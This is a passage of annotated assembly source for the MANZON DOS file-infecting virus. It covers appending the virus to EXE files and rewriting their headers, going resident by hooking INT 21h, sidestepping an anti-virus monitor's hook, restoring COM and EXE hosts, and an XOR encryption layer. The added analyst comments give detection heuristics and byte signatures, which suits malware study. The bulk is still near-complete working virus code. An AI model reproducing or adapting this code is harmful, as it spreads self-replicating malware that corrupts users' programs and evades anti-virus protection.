mov ax,dx
shl eax,16
add eax,ecx ; Build filesize in eax
mov edx,eax ; Save filesize
xor ebx,ebx
mov bx, word ptr ds:[EXE_SHe]
shl ebx,4 ; Build real Headersize
sub eax,ebx ; Filesize-Headersize=CS:IP!!
push eax ; Save new CS:IP for later use
call FixSegOffs ; Fix CS:IP so IP<10h
mov dword ptr ds:[EXE_IP],eax
mov [entry_p],ax ; Set virus entrypoint
mov [IPOffs],-3 ; No offset in EXE-files
mov bx,[File_H]
call WriteVirus ; Write virus to EOF
xor eax,eax
xor ebx,ebx
mov ax,word ptr ds:[EXE_Mod] ; Bytes on last page
mov bx,word ptr ds:[EXE_Siz] ; Size/512
shl ebx,9 ; Mul 512
add eax,ebx ; Make progsize
add eax,filecodelength ; Add code_size
xor ebx,ebx
mov bx,word ptr ds:[CLength]
add eax,ebx ; Add decryptsize
add eax,12 ; add InitCX,Loop etc
mov ebx,eax
shr ebx,9 ; Make new progsize/512
and ax,01ffh ; Make modulo
mov word ptr ds:[EXE_Siz],bx
mov word ptr ds:[EXE_Mod],ax
add word ptr ds:[EXE_Min],(code_size+100)/16
mov word ptr ds:[EXE_Max],-1
pop eax ; Get CS:IP
xor ebx,ebx
mov bx,word ptr ds:[CLength] ; Length of decryptor
add eax,ebx
add eax,12 ; Add INIT_CX, INIT_SI etc
add eax,VirStk-Code_Start ; Add pos of Stack
inc eax ; Add one byte and...
and al,0feh ; ...make sure it's even
call FixSegOffs ; Fix so SP<10h
mov word ptr ds:[EXE_SP],ax ; Save new SS:SP
shr eax,16
mov word ptr ds:[EXE_SS],ax ; Save new SS:SP
mov bx,[File_H]
mov ax,4200h ; Go to SOF
xor cx,cx
cwd
int 21h
mov ah,40h
mov cx,18h ; Size of EXE-header
mov dx,offset EXE_Header
int 21h ; Write new header
SkipInfect:
ret
;-----------------------------------------------------------------------
; FixSegOffs - turn a linear byte offset into segment:offset form with
;              the offset part reduced below 10h.
; Syntax: 16-bit real-mode DOS code, Intel operand order, 386 registers.
; In:    eax = linear offset (bits 20 and above are shifted out below)
; Out:   eax = segment in the high word, offset (< 10h) in the low word
; Clobb: ebx, flags
; The callers visible in this file store the result into the host's
; EXE header: once into EXE_IP/EXE_CS and once into EXE_SP/EXE_SS.
; Analyst note: the effect is that a modified host ends up with an
; entry IP below 10h and a CS that points at the tail of the load image,
; which is a usable triage heuristic for appended code.
;-----------------------------------------------------------------------
FixSegOffs:
mov ebx,eax ; bx keeps the original low 16 bits
xor ax,ax ; eax = input with its low word cleared
shl eax,12 ; input bits 16-19 -> high word = (input >> 16) * 1000h paragraphs
mov ax,bx ; low word = original low 16 bits (offset part)
FixSegOffsLoop:
mov bx,ax
cmp bx,10h
jb short DoneFix ; offset already below one paragraph -> done
; Adding 0FFF0h lowers the low word by 10h and the carry raises the
; high word (segment) by one, so the linear address stays the same.
add eax,00010000h - 00000010h ; 1 para up..
jmp short FixSegOffsLoop
DoneFix:
ret
; Embedded identification string. The first part is stored literally; each
; character of the author tag that follows has 1..8 added to it at
; assembly time, so the tag does not appear as readable text.
; Analyst note: the assembled bytes are 'MANZON (c) ' followed by
; 'Sgg1F5PZ' (53h 67h 67h 31h 46h 35h 50h 5Ah). A string search for the
; un-shifted tag will not match. Whether this region is also covered by
; the XOR layer (SimpleCryptStart..SimpleCryptEnd) cannot be told from
; this part of the listing - confirm before relying on it as a
; plaintext indicator in files.
id db 'MANZON (c) '
db 'R' + 1
db 'e' + 2
db 'd' + 3
db '-' + 4
db 'A' + 5
db '/' + 6
db 'I' + 7
db 'R' + 8
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:
;+ Following code will check if virus is resident, +:
;+ allocate memory, copy virus to memory, set the new +:
;+ interrupt vector and transfer control to the program +:
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:
;-----------------------------------------------------------------------
; InstallVirus - residency installer, entered by a near CALL so that the
;                return address on the stack gives the run-time position
;                of the code.
; In:    [sp] = return address (original comment: start of virus + 3)
;        ds   = PSP segment of the host (per the original comment)
; Flow:  1. ask INT 21h AX=0DCBAh whether a copy is already resident
;        2. shrink the current memory block and allocate a new one
;        3. mark the new block as owned by DOS, copy code_size bytes
;        4. read the INT 21h vector, skipping one specific hook layout
;        5. point INT 21h at NewVect in the resident copy
;        6. fall into 'installed', which picks the COM or EXE hand-back
; Analyst notes (behavioural indicators taken from this code):
;        - INT 21h called with AX=0DCBAh, expecting DX == AX on return
;        - a memory block whose MCB owner word is 0008h but which holds
;          non-DOS code and the INT 21h handler
;        - INT 21h vector pointing into that block
;-----------------------------------------------------------------------
InstallVirus:
pop si ; Get Start of virus+3
push si ; Save it again for later use.
push ds ; push PSP for later use
push cs
pop ds
;+:+:+:+:+:+:+:+:+:+: Check if virus is active :+:+:+:+:+:+:+:+:+:+:+:
; "Are you there" call: presumably answered by the resident handler
; (NewVect, not shown here) by returning DX equal to AX - confirm there.
mov ax,0DCBAh
int 21h
cmp dx,ax
je short Installed ; Virus found in memory
;+:+:+:+:+:+:+:+:+:+: Allocate memory for virus :+:+:+:+:+:+:+:+:+:+:+:
; AH=4Ah with BX=0FFFFh is a resize request that cannot succeed; DOS
; reports the largest possible size in BX. ES is assumed to still hold
; the PSP segment here - it is not changed in the visible code.
mov ah,4ah ; Get top of memory
push ax
mov bx,-1
int 21h
sub bx,(code_size)/16+2 ; Resize memory allocation
pop ax
int 21h
mov ah,48h ; Allocate memory for Virus
mov bx,(code_size)/16+1
int 21h
jc short Installed ; If error then exit
; AX = segment of the new block; the MCB sits one paragraph below it.
dec ax ; dec AX to get pointer to MCB
mov es,ax
; Owner word 0008h marks the block as belonging to DOS, so it is not
; released when the host program terminates.
mov word ptr es:[1],8 ; Set DOS as owner of memory
; es = block segment - 10h, so es:0100h addresses the first byte of the
; block and the copy keeps the same offsets it was assembled with.
sub ax,0fh ; 100h bytes from allocstart
mov es,ax ; to get same offset in TSR-code
;+:+:+:+:+:+:+:+:+:+:+:+: Copy virus to memory :+:+:+:+:+:+:+:+:+:+:+:
sub si,6 ; back from the return address to the start of the code
mov di,0100h
mov cx,code_size
rep movsb ; move 'em up
;****** Get address of old INT21h and save it in the Do21-jump.
push es
pop ds ; ds = segment of the resident copy
mov ax,3521h
int 21h ; es:bx = current INT 21h handler
; If the handler begins with bytes EBh 05h followed by EAh (a short jump
; over a far jump), take the far pointer stored at offset +3 as the
; handler instead and test again. The label name suggests this layout
; belongs to a resident anti-virus monitor; the effect is that the
; address saved in OldInt lies below such a hook.
tbavfuck:
cmp word ptr es:[bx],05ebh
jne notbav
cmp byte ptr es:[bx+2],0eah
jne notbav
les bx,es:[bx+3]
jmp tbavfuck
notbav:
mov word ptr ds:[OldInt+2],es ; Save address to real INT
mov word ptr ds:[OldInt],bx ; in the JMP-string
;****** Set new INT21h
mov dx,offset NewVect ; Set New interruptvector
mov ax,2521h
int 21h
; Common exit: reached after installing, when a copy is already
; resident, or when the allocation failed.
installed:
pop ax ; Get PSP
pop si
sub si,106h ; si = difference between run-time and assembled offsets
; IPoffs holds 100h for a COM host; the EXE infection path visible
; earlier in this file stores -3 there instead.
cmp word ptr cs:[si+IPoffs],100h ; Are we in a COM-file
je short RestoreComFile
;-----------------------------------------------------------------------
; RestoreExeFile - hand control back to an EXE host.
; In:    ax = PSP segment, si = run-time delta used to address the
;        saved Real_CS / Real_IP / Real_SS / Real_SP values
; Out:   does not return; RETF transfers to the host's original CS:IP
;        with ds = es = PSP, the host's SS:SP loaded and
;        ax, bx, cx, dx, si, di, bp cleared
; The saved segment values are relative to the load image, so the
; load segment (PSP + 10h) is added before they are used.
;-----------------------------------------------------------------------
RestoreExeFile:
mov ds,ax ; Let ds contain PSP
mov es,ax ; Let es contain PSP
add ax,10h ; Get start of file
add word ptr cs:[si+Real_CS],ax ; Add start seg to CS
add ax,word ptr cs:[si+Real_SS]
mov ss,ax ; Get programs SS
mov sp,word ptr cs:[si+Real_SP] ; Get programs SP
sub sp,2 ; Fix right value for SP
; Build a far return frame that points at the host entry point.
push word ptr cs:[si+Real_CS]
push word ptr cs:[si+Real_IP]
; Clear the general registers before the host starts.
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
mov si,ax
mov di,ax
mov bp,ax
retf
;-----------------------------------------------------------------------
; RestoreComFile - hand control back to a COM host.
; In:    si = run-time delta used to address 'buffer'
; Out:   does not return; a near RET to offset 0100h starts the host
;        with ds = es = cs and ax, bx, cx, dx, si, di, bp cleared
; 'buffer' holds the host's original first three bytes; they are copied
; back over offset 0100h in memory before the jump.
; Analyst note: the replacement of exactly three bytes at the start of
; a COM image matches the size of a near jump, so the first three bytes
; of an affected COM file are worth inspecting during triage.
;-----------------------------------------------------------------------
RestoreComFile:
mov ax,cs
mov ds,ax
mov es,ax
add si,offset buffer ; Restore real 3 first bytes
mov di,0100h
movsw
movsb
; Clear the general registers before the host starts.
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
mov si,ax
mov di,ax
mov bp,ax
push 0100h ; return address = COM entry point
ret
;-----------------------------------------------------------------------
; StartDecryptSimple - position-independent entry of the XOR layer.
; SimpleCryptEnd marks the end of the region the layer covers, so this
; stub and the routines after it lie outside that region.
; Out:   region SimpleCryptStart..SimpleCryptEnd XORed in place with
;        the byte held in DSRan
; Clobb: ax, cx, si, bp, flags
; Analyst note: CALL to the next instruction followed by a read of the
; return address is the usual way for relocated code to find itself,
; and is a common static heuristic.
;-----------------------------------------------------------------------
SimpleCryptEnd:
StartDecryptSimple:
call GetIPLabel ; pushes the run-time address of GetIPLabel
GetIPLabel:
mov bp,sp
mov si,[bp] ; si = run-time address of GetIPLabel
sub si,GetIPLabel-SimpleCryptStart ; si = run-time address of SimpleCryptStart
mov cx, SimpleCryptEnd-SimpleCryptStart ; cx = length of the covered region
Call DecryptSimple
pop ax ; discard the address pushed by 'call GetIPLabel'
ret
;-----------------------------------------------------------------------
; EncryptDecryptSimple - apply the XOR layer using assembled offsets.
; Unlike StartDecryptSimple this uses 'offset SimpleCryptStart'
; directly, so it only works where the code runs at its assembled
; offsets (presumably the resident copy - confirm against callers).
; XOR is its own inverse, so the same call encrypts or decrypts.
; Clobb: cx, si, flags
;-----------------------------------------------------------------------
EncryptDecryptSimple:
mov si,offset SimpleCryptStart
mov cx, SimpleCryptEnd-SimpleCryptStart
call DecryptSimple
ret
;-----------------------------------------------------------------------
; DecryptSimple - XOR cx bytes at cs:[si] with a one-byte key.
; In:    si = start offset, cx = byte count
; Out:   si advanced past the region, cx = 0
; Clobb: flags
; The instruction is emitted as raw bytes so that its immediate operand
; has a label (DSRan) and can be overwritten at run time; the code that
; sets the key is not in this part of the listing. As assembled the key
; is 0, which leaves the data unchanged.
; Analyst note: the three opcode bytes 2Eh 80h 34h are fixed, the
; fourth byte is the key and varies, so a byte signature for this loop
; needs a wildcard in that position. A single-byte XOR over a
; contiguous region is recoverable by trying all 256 keys.
;-----------------------------------------------------------------------
DecryptSimple:
db 02eh,080h,034h ; xor byte ptr cs:[si],?
DSRan db 0
inc si
loop DecryptSimple
ret
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code acts like a buffer in memory, and is not :+
;+ included when the virus is written to a file. :+
;+ (Normally known as the heap) :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
; Uninitialised work area that follows the code. Per the banner above it
; exists only in memory and is not part of what is written to a file.
filecodeend: ; Label to calculate code_size,
; and to use when jumping to copy
; of EWD-routine
ED_buf db ED_end-ED_start dup (?) ; space for copy of the EWD-routine
File_H dw ? ; Filehandle
; Space for the created decryptionroutine
; (3 + 3 bytes of register setup, then 17 dwords = 68 bytes of
; generated instructions)
InitCX1 db ?,?,? ; mov cx,virsize+(0 to 7)
InitSI1 db ?,?,? ; mov si,offset start
CCode1 dd ?,?,?,?,?,?,?,? ; 1 to 15 decryptrows
dd ?,?,?,?,?,?,?
dd ?,? ; + loop statement
; Space for the created encryptionroutine
CCode2 dd ?,?,?,?,?,?,?,? ; 1 to 15 decryptrows
dd ?,?,?,?,?,?,?
dd ?,?
; In-memory copy of the first 18h bytes of the host's MZ header, plus
; the byte at offset 18h. The infection path visible earlier in this
; file rewrites EXE_Mod, EXE_Siz, EXE_Min, EXE_Max, EXE_SS, EXE_SP,
; EXE_IP and EXE_CS and writes the 18h bytes back to the start of the
; file.
; Analyst note: after modification EXE_Max is 0FFFFh, EXE_IP is below
; 10h and EXE_CS:EXE_IP equals the previous file size minus the header
; size - fields to compare against a known-good copy of the host.
EXE_Header: ; Structure
EXE_Sig dw ? ; MZ or ZM
EXE_Mod dw ? ; size - int(size/512)
EXE_Siz dw ? ; size/512
EXE_Rel dw ? ; Relocation items
EXE_SHe dw ? ; Size of header/16
EXE_Min dw ? ; Min mem/16
EXE_Max dw ? ; Max mem/16
EXE_SS dw ? ; Stack Segment
EXE_SP dw ? ; Stack Pointer
EXE_CHK dw ? ; Checksum
EXE_IP dw ? ; Instruction Pointer
EXE_CS dw ? ; Code Segment
EXE_Win db ? ; 40h if Windows EXE
; 32-byte area whose offset from Code_Start is used when the new
; EXE_SS:EXE_SP is computed.
VirStk: db 32 dup (?) ; Stack used by the virus (EXE only)
code_end:
end start
;===============================================================================